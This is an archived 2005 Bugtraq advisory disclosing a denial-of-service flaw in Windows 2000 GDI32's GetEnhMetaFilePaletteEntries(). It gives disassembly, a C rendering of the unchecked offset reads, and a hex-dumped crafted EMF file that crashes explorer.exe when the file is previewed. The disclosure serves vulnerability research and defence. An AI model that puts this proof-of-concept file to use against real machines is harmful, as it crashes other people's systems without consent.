Windows 2000 GDI32.DLL GetEnhMetaFilePaletteEntries() API specially crafted EMF file DOS vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Windows 2000 GDI32.DLL GetEnhMetaFilePaletteEntries() API specially crafted EMF file DOS vulnerability
From: Hongzhen Zhou <felix__zhou@xxxxxxxxxxx>
Date: 17 Mar 2005 10:16:52 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


     Windows 2000 GDI32.DLL GetEnhMetaFilePaletteEntries() API specially 
crafted EMF file DOS vulnerability

1. Description

Windows 2000 GDI32.DLL GetEnhMetaFilePaletteEntries() API 
doesn't process the EMF file properly, a application which calls 
the API will crash when it reads some specially crafted EMF files.

2. Detail

Let us review the code:

----------------------------------------------------------
The Disassembled GDI32.GetEnhMetaFilePaletteEntries() 
----------------------------------------------------------
77F68CC7        PUSH ESI
77F68CC8        PUSH EDI
77F68CC9        PUSH 460000
77F68CCE        PUSH DWORD PTR SS:[ESP+10]
77F68CD2        CALL GDI32.77F48A89
77F68CD7        TEST EAX,EAX
77F68CD9        JNZ SHORT GDI32.77F68CE0
77F68CDB        OR EAX,FFFFFFFF
77F68CDE        JMP SHORT GDI32.77F68D11
77F68CE0        MOV EDI,DWORD PTR SS:[ESP+14]
77F68CE4        TEST EDI,EDI
77F68CE6        JNZ SHORT GDI32.77F68CF0
77F68CE8        MOV EAX,DWORD PTR DS:[EAX+C]
77F68CEB        MOV EAX,DWORD PTR DS:[EAX+44]
77F68CEE        JMP SHORT GDI32.77F68D11
77F68CF0        MOV ECX,DWORD PTR DS:[EAX+C]
77F68CF3        MOV EAX,DWORD PTR DS:[ECX+44]
77F68CF6        CMP DWORD PTR SS:[ESP+10],EAX
77F68CFA        JNB SHORT GDI32.77F68D00
77F68CFC        MOV EAX,DWORD PTR SS:[ESP+10]
77F68D00        MOV EDX,DWORD PTR DS:[ECX+30]
77F68D03        ADD EDX,ECX
77F68D05        MOV ECX,EAX
77F68D07        SUB EDX,DWORD PTR DS:[EDX-4]
77F68D0A        MOV ESI,DWORD PTR DS:[EDX+C] 
77F68D0D        ADD ESI,EDX
77F68D0F        REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] 
77F68D11        POP EDI
77F68D12        POP ESI
77F68D13        RETN 0C
-----------------------------------------------------------
Translated into C Code
-----------------------------------------------------------
UINT GetEnhMetaFilePaletteEntries(
    HENHMETAFILE hemf,  // handle of enhanced metafile 
    UINT cEntries,      // count of palette entries 
    LPPALETTEENTRY lppe         // address of palette-entry array  
   ) 
{
        char *begin, *end, *emreof, *palent;
        DWORD count, i;

        // ......

        begin = emf file offset in memory;

        // get the count of palette entries from the emf file
        count = *((DWORD *)(begin + 0x44)); 

        if (lppe == 0)
                 return count; 
 
        if (size > count)
                 size = count;
        
        // find the end of the emf file
        end = begin + *((DWORD *)(bigin + 0x30));

        // find the offset of emreof
        emreof = end - *((DWORD *)(end - 0x04));

        // find the offset of palentries
        palent = emreof + *((DWORD *)(emreof + 0x0c));

        // copy the palent from the file to palette-entry array
        for (i = 0; i < size; i++) 
                 memcpy(lppe + i, palent + i * 4, 4);
        
        return size;
}
-----------------------------------------------------------

You can see that there isn't validity check, so it may cause  
access violation when it uses the offset value("end", "emreof", 
"palent") which read from the EMF.

3. Impact

The specific impact depends on the application using the API.
Generally, if there is a non-zero value in EMRHEAD->nPalEntries,
the application will call this API, and pass EMRHEAD->nPalEntries
to the second parameter, a specially crafted EMF will crash 
the Application if the address it accesses to is not valid.  

<<< Explorer.exe >>>

The explorer.exe(maybe a DLL called by explorer) always use 
0x100 as the second parameter. And even if there is a zero 
value in EMRHEAD->nPalEntries, if the "end" value in the end
of EMF file is bigger than some value(0x14 ??? I'm not sure), 
it will also call this API to get the Palette entries.(strangely ?)

When you open the explorer.exe to open the folder which has a 
crafted EMF file, if you click on the file in explorer's right 
client area, just click, the explorer.exe will display the EMF file 
in its left client area which will crash itself.

4. POC

A hex dumped EMF file:
-------------------------------------------------------
0000000 01 00 00 00 64 00 00 00 93 00 00 00 02 00 00 00
0000010 83 01 00 00 39 01 00 00 00 00 00 00 00 00 00 00
0000020 d1 08 00 00 be 06 00 00 20 45 4d 46 00 00 01 00
0000030 78 00 00 00 17 00 00 00 03 00 00 00 0f 00 00 00
0000040 64 00 00 00 41 00 00 00 c8 12 00 00 c2 1a 00 00
0000050 cc 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00
0000060 00 00 00 00 0e 00 00 00 14 00 00 00 41 00 00 00
0000070 41 42 43 44 00 00 01 ff
-------------------------------------------------------

If it doesn't crash your explorer.exe, change the last 8
byte's values and try again, but I think it needn't change:)

Or you can change some normal EMF files in your Win2k to test.

5. Author

felix__zhou _at_  hotmail _dot_ com
      hzhou _at_ fortinet _dot_ com

Prev by Date: Re: [Full-disclosure] Unfiltered escape sequences in filenames contained in ZIP archives wouldn't be escaped on displaying or logging, and can also lead to bypass AV scanning
Next by Date: XSS in ACS blog
Previous by thread: [CLA-2005:937] Conectiva Security Announcement - cyrus-imapd
Next by thread: XSS in ACS blog
Index(es):
- Date
- Thread